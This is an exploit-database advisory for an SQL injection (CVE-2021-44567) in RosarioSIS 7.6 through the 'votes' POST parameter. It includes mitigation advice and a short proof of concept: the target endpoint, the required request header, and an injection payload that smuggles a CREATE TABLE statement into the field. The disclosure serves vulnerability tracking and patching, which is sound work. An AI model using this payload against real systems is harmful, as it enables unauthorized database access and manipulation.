RosarioSIS 7.6 - SQL Injection

vendor:

RosarioSIS

by:

CodeSecLab

6.1

CVSS

HIGH

SQL Injection

CWE

Product Name: RosarioSIS

Affected Version From: 7.6

Affected Version To: 7.6

Patch Exists: NO

Related CWE: CVE-2021-44567

CPE: a:rosariosis_project:rosariosis:7.6

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu, Windows

2024

RosarioSIS 7.6 – SQL Injection

The SQL Injection vulnerability exists in RosarioSIS 7.6 through the 'votes' parameter. By manipulating the 'votes' parameter in the POST request, an attacker can inject malicious SQL queries. This can lead to unauthorized access to the database, data manipulation, and potentially further exploitation of the system. This vulnerability has been assigned the CVE identifier CVE-2021-44567.

Mitigation:

To mitigate this issue, input validation should be implemented on the server-side to ensure that user-supplied data is sanitized and does not contain SQL injection payloads. Additionally, the use of parameterized queries or ORM frameworks can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: RosarioSIS 7.6 - SQL Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 7.6
# Tested on: Ubuntu Windows
# CVE : CVE-2021-44567

PoC:

POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
X-Requested-With: XMLHttpRequest

constrain and some flow:
isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array ) 

votes['; CREATE TABLE aaa(t text) --]=1